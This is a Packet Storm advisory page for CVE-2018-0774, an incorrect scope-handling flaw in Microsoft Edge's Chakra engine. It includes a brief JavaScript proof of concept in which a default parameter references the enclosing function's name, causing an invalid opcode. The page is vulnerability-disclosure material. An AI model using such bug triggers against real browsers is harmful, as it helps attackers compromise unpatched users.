Microsoft Edge Chakra suffers from an incorrect scope handling vulnerability.
4ca74358ba02f965f602b3248f2892c43dff8cda26201ab58168fbbe9c7741b4Microsoft Edge: Chakra: Incorrect scope handling
CVE-2018-0774
PoC:
(function func(arg = function () {
print(func); // SetHasOwnLocalInClosure should be called for the param scope in the PostVisitFunction function.
}()) {
print(func);
function func() {
}
})();
Chakra fails to distinguish whether the function is referenced in the param scope and ends up to emit an invalid opcode.
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
Found by: lokihardt
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed